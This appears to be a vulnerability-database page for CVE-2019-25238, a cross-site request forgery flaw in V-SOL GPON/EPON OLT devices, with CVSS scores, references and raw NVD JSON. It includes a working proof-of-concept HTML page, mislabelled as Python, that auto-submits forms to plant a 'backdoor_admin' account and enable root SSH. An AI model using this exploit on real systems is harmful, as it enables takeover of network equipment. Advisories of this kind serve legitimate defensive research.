CVE-2019-25238

Description

V-SOL GPON/EPON OLT Platform 2.03 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to create admin users, enable SSH, or modify system settings by tricking authenticated administrators into loading a specially crafted page.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

V-SOL GPON/EPON OLT Platform <= 2.03

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2019-25238: Create Admin User -->
<html>
  <body>
    <h1>CVE-2019-25238 CSRF Exploit - Create Admin User</h1>
    <p>Target: V-SOL GPON/EPON OLT Platform <= 2.03</p>
    
    <!-- Auto-submit form to create new admin user -->
    <form id="csrfForm" action="http://TARGET_IP:8080/cgi-bin/user_mng.cgi" method="POST" enctype="text/plain">
      <input type="hidden" name="action" value="add">
      <input type="hidden" name="user_type" value="admin">
      <input type="hidden" name="username" value="backdoor_admin">
      <input type="hidden" name="password" value="P@ssw0rd123">
      <input type="hidden" name="privilege" value="15">
    </form>

    <!-- Enable SSH access -->
    <form id="sshForm" action="http://TARGET_IP:8080/cgi-bin/ssh_config.cgi" method="POST">
      <input type="hidden" name="action" value="enable">
      <input type="hidden" name="ssh_port" value="22">
      <input type="hidden" name="permit_root" value="1">
    </form>

    <script>
      // Auto-submit forms when page loads
      document.addEventListener('DOMContentLoaded', function() {
        // Submit admin creation request
        document.getElementById('csrfForm').submit();
        // Small delay before SSH request
        setTimeout(function() {
          document.getElementById('sshForm').submit();
        }, 1000);
      });
    </script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25238
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25238
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25238/
[4] VulDB https://vuldb.com/cve/CVE-2019-25238
[5] https://www.exploit-db.com/exploits/47434
[6] https://www.vsolcn.com
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25238", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:51.543", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "V-SOL GPON/EPON OLT Platform 2.03 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to create admin users, enable SSH, or modify system settings by tricking authenticated administrators into loading a specially crafted page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/47434", "source": "[email protected]"}, {"url": "https://www.vsolcn.com", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}